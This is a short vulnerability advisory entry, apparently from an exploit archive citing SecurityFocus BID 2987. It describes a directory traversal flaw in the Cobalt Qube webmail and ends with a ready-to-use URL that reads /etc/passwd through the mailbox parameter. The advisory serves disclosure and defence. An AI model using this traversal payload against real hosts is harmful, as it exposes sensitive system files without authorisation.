8 lines
No EOL
534 B
Text
8 lines
No EOL
534 B
Text
source: http://www.securityfocus.com/bid/2987/info
|
|
|
|
Cobalt Qube is an fully-featured network "server appliance".
|
|
It includes pre-installed tools and applications and can be put online with very little configuration.
|
|
|
|
A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host.
|
|
|
|
http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 |